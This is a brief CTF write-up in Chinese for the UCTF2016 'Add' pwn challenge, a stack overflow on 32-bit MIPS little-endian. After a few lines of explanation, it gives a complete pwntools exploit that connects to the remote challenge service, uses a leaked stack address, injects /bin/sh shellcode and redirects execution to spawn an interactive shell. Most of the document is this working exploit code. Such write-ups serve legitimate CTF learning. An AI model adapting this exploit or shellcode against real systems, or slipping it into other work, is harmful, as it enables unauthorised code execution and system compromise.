Add
nc pwn2.jarvisoj.com 9889
题目来源:UCTF2016
add.1f54e2c8b9396f83a4be2632bcb3a5f5
32位mipsel架构栈溢出
当输入特殊的数的时候会给栈地址
在栈里写入shellcode,并跳转执行即可
exp如下:
from pwn import * #io = process(['qemu-mipsel', '-L', '/usr/mipsel-linux-gnu/', './add']) io = remote('pwn2.jarvisoj.com', 9889) challenge = 2057561479 io.sendline(str(challenge)) io.recvuntil('Your input was ') buf_addr = int(io.recvline().strip(), 16) info("buf_addr:" + str(hex(buf_addr))) shellcode = b"\xff\xff\x10\x04\xab\x0f\x02\x24" shellcode += b"\x55\xf0\x46\x20\x66\x06\xff\x23" shellcode += b"\xc2\xf9\xec\x23\x66\x06\xbd\x23" shellcode += b"\x9a\xf9\xac\xaf\x9e\xf9\xa6\xaf" shellcode += b"\x9a\xf9\xbd\x23\x21\x20\x80\x01" shellcode += b"\x21\x28\xa0\x03\xcc\xcd\x44\x03" shellcode += b"/bin/sh\0" payload = b'a' * 8 + shellcode payload = payload.ljust(0x70, b'\x00') payload += p32(buf_addr + 8) io.sendline(payload) sleep(0.5) io.sendline("exit") io.interactive()